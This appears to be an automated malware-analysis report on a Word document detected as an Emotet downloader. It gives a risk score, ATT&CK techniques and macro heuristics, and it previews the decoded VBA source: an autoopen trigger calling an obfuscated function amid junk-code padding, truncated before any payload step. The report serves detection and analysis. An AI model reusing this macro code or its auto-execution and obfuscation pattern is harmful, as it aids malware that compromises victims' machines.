MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
T1059 Command and Scripting Interpreter
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6938868-0', strongly suggesting the Emotet family. Critical heuristics indicate the presence of VBA macros that utilize WMI to launch processes, a common technique for executing downloaded payloads. The autoopen macro is present, which is a standard execution trigger for malicious Office documents.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6938868-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6938868-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32892 bytes |
SHA-256: 01b5a0db12d972bb4af9dd31bfba12e38a92648f0541e025b2951581b930dad0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "VAAUUB_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "icAAZoX"
Attribute VB_Base = "0{2997F2DB-1262-4586-8D08-231C591B1D29}{B4C2A185-133C-4791-9324-9DF33FE5AE67}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "BoUwUUXG"
Attribute VB_Base = "0{2C3E3C8E-70E1-4DA6-93E3-30FEC4787FA1}{6C0DE2F1-FA8D-4CF5-84CB-7790AB357B83}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "wAQAA_"
Sub autoopen()
If uxAAkAD = NA1QG4Z Then
jAQAAA = zA1_QoB - ToXAUUo
Select Case iXQwBXc
Case 65162038
kADUAUC = CVar(666578847 * Rnd(ZA_QcwAx * Round(887473702) / 242864275 * CLng(757993238 * Sqr(YGZoA4kZ))))
S1BA_B4A = Round(NcwAAw4B)
Case 944900146
lAcAAkBw = XQAkZA
YABAXB = Atn(493293848)
End Select
End If
If aGQCAk = ikBX1c Then
hxX1AX = oBAA_BAU - K4UkAoDk
Select Case jAXGUxB
Case 271243162
zAGAXAwC = CVar(681153159 * Rnd(W4AQQAQ * Round(103699670) / 317246957 * CLng(195825112 * Sqr(hXAGwD))))
TxAAoA = Round(ZAAAAAAB)
Case 556483373
kAAAAx = WBQxow
UBoo4A = Atn(576082915)
End Select
End If
KA_BAZZD
If IDACCB = TAAABkC Then
HAAAAAUD = hBZwo1 - pAUQABA
Select Case WwAAAUAc
Case 586122411
MGw4AQAG = CVar(885125058 * Rnd(IBQA1w * Round(594991175) / 99850238 * CLng(909829081 * Sqr(XcAZGB_B))))
iAkkAD = Round(CAXkAAC)
Case 640849976
kUZQ_U = YAkcw1
iDAxBkUA = Atn(865124187)
End Select
End If
If SAGx_DAA = HcxGADAA Then
o1GAA4B = OkUxkAUc - nDAxAGC
Select Case MoAQAAxA
Case 988188220
tZwUQAAC = CVar(921200261 * Rnd(GAAAUAA * Round(742046848) / 354836337 * CLng(103513869 * Sqr(soC4UAk))))
Rk_AowAX = Round(G_GAA4co)
Case 848979372
OoAAUQ = BwAAAQ
DQCcBkk = Atn(429605869)
End Select
End If
End Sub
Attribute VB_Name = "jxUoA1"
Function KA_BAZZD()
On Error Resume Next
If uUAX1wxD = BAAA4UB Then
nw1ZoAA = RCCQxZ - GCBUAX
Select Case cAkADkU
Case 904750789
j4X1DAA = CVar(910214260 * Rnd(iAAACQ * Round(584309993) / 917770668 * CLng(906200044 * Sqr(BABAQAA))))
NAABAQ = Round(dAGAXAA1)
Case 627849234
bQQcGxAA = iAQoQAQB
IGADBxxB = Atn(94616384)
End Select
End If
If iDDZAA = EQUcAcQ Then
I1AADZU = zABQBAZ - DUcAX1
Select Case mAAAoB
Case 366587228
IAXwBD = CVar(512595410 * Rnd(zAQcD_4A * Round(461546983) / 529527392 * CLng(456643298 * Sqr(fwAQDA))))
L_B1A4 = Round(LA_AAA)
Case 25159617
NAGwDBwB = wADxDB
SGUCoAQw = Atn(214933498)
End Select
End If
If u_wBA1AA = noQwBQX Then
PA1AQAC = MAQXUQBA - pCXB1o
Select Case ncQD1A
Case 688333490
fA_CADB = CVar(695435046 * Rnd(dXcDAGA * Round(487424603) / 695365938 * CLng(122760197 * Sqr(bADAwCko))))
cAwXGXZ = Round(uowQAQ4)
Case 457228699
ncxAAQ = HoABBkA
IAxBxA = Atn(524129598)
End Select
End If
If 7008 < 87979 Then
AooAAoAA = 0
If aAQAcAD = kxD1A1 Then
EABAA4 = o_ocAAUD - OAxDDAAo
Select Case kcC1Bwc_
Case 313975799
GBAXAZ = CVar(528931707 * Rnd(OxGwxAk * Round(9456710) / 354298458 * CLng(406005794 * Sqr(TwxAQBk))))
NxDZAG =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.